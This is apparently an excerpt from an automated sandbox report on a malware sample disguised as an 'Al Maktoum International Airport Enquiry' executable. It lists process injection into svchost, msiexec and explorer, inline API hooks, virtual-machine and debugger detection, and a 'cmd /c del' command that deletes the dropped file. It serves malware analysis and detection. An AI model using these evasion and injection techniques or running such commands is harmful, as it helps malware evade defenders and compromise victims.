          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic file information: File size 1120768 > 1048576
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msiexec.pdb source: svchost.exe, 00000001.00000003.1731890191.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732589593.0000000002DE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1731832178.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000002.4130359525.0000000000970000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000001.00000003.1731890191.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732589593.0000000002DE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1731832178.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130359525.0000000000970000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1677807902.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1681546736.0000000004130000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1679568145.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1685637489.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.0000000003000000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.000000000514E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1732637113.0000000004C52000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1734235728.0000000004E07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1677807902.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1681546736.0000000004130000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1679568145.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1685637489.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.0000000003000000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000002.4131442242.000000000514E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1732637113.0000000004C52000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1734235728.0000000004E07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4144395601.0000000010E1F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130764013.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4132018408.00000000054FF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4144395601.0000000010E1F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130764013.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4132018408.00000000054FF000.00000004.10000000.00040000.00000000.sdmp
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CFC304 LoadLibraryA,GetProcAddress,0_2_00CFC304
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE8719 push FFFFFF8Bh; iretd 0_2_00CE871B
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CAE94F push edi; ret 0_2_00CAE951
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CAEA68 push esi; ret 0_2_00CAEA6A
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CA8B85 push ecx; ret 0_2_00CA8B98
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CAEC43 push esi; ret 0_2_00CAEC45
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CAED2C push edi; ret 0_2_00CAED2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300225F pushad ; ret 1_2_030027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030027FA pushad ; ret 1_2_030027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx1_2_030309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300283D push eax; iretd 1_2_03002858
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300135E push eax; iretd 1_2_03001369
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02690006 push cs; retf 1_2_0269000C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02686A5F push esp; ret 1_2_02686A65
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026869BA push edi; ret 1_2_026869C2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02687012 push ds; retf 1_2_02687016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268D4B5 push eax; ret 1_2_0268D508
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268D56C push eax; ret 1_2_0268D572
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268D50B push eax; ret 1_2_0268D572
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268D502 push eax; ret 1_2_0268D508
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EEB1E push esp; retn 0000h1_2_035EEB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EEB02 push esp; retn 0000h1_2_035EEB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EE9B5 push esp; retn 0000h1_2_035EEAE7
          Source: C:\Windows\explorer.exeCode function: 2_2_0E695B02 push esp; retn 0000h2_2_0E695B03
          Source: C:\Windows\explorer.exeCode function: 2_2_0E695B1E push esp; retn 0000h2_2_0E695B1F
          Source: C:\Windows\explorer.exeCode function: 2_2_0E6959B5 push esp; retn 0000h2_2_0E695AE7
          Source: C:\Windows\explorer.exeCode function: 2_2_0FC25B02 push esp; retn 0000h2_2_0FC25B03
          Source: C:\Windows\explorer.exeCode function: 2_2_0FC25B1E push esp; retn 0000h2_2_0FC25B1F
          Source: C:\Windows\explorer.exeCode function: 2_2_0FC259B5 push esp; retn 0000h2_2_0FC25AE7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_00979F2D push ecx; ret 3_2_00979F40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FB27FA pushad ; ret 3_2_04FB27F9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FB225F pushad ; ret 3_2_04FB27F9
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeFile created: \new al maktoum international airport enquiry ref #2401249.exe
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeFile created: \new al maktoum international airport enquiry ref #2401249.exeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_00977DD0 StartServiceCtrlDispatcherW,GetLastError,3_2_00977DD0

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xEB
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C84A35
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00D055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00D055FD
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CA33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00CA33C7
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeAPI/Special instruction interceptor: Address: 22A3214
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 2679904 second address: 267990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 2679B7E second address: 2679B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E rdtsc 1_2_0307096E
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2839Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7097Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 884Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-98244
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeAPI coverage: 4.2 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.0 %
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 1.7 %
          Source: C:\Windows\explorer.exe TID: 7780Thread sleep count: 2839 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7780Thread sleep time: -5678000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7780Thread sleep count: 7097 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7780Thread sleep time: -14194000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7636Thread sleep count: 5505 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7636Thread sleep time: -11010000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7636Thread sleep count: 4467 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7636Thread sleep time: -8934000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CE4696
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CEC9C7
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEC93C FindFirstFileW,FindClose,0_2_00CEC93C
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CEF200
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CEF35D
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CEF65E
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CE3A2B
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CE3D4E
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CEBF27
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C84AFE
          Source: explorer.exe, 00000002.00000000.1693190718.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000000.1692654831.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000002.00000000.1692654831.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000002.00000000.1693190718.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000002.4130664526.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000002.00000003.3105640065.0000000009976000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000002.00000000.1692654831.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000002.00000003.3106730980.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000003.3105640065.0000000009976000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000002.00000003.3106633874.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000002.00000002.4130664526.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000002.00000002.4135231321.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000002.00000002.4130664526.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeAPI call chain: ExitProcess graph end nodegraph_0-96914
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E rdtsc 1_2_0307096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B60 NtClose,LdrInitializeThunk,1_2_03072B60
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CF41FD BlockInput,0_2_00CF41FD
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C83B4C
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CB5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00CB5CCC
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CFC304 LoadLibraryA,GetProcAddress,0_2_00CFC304
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h]1_2_0302C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h]1_2_03050310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov ecx, dword ptr fs:[00000030h]1_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
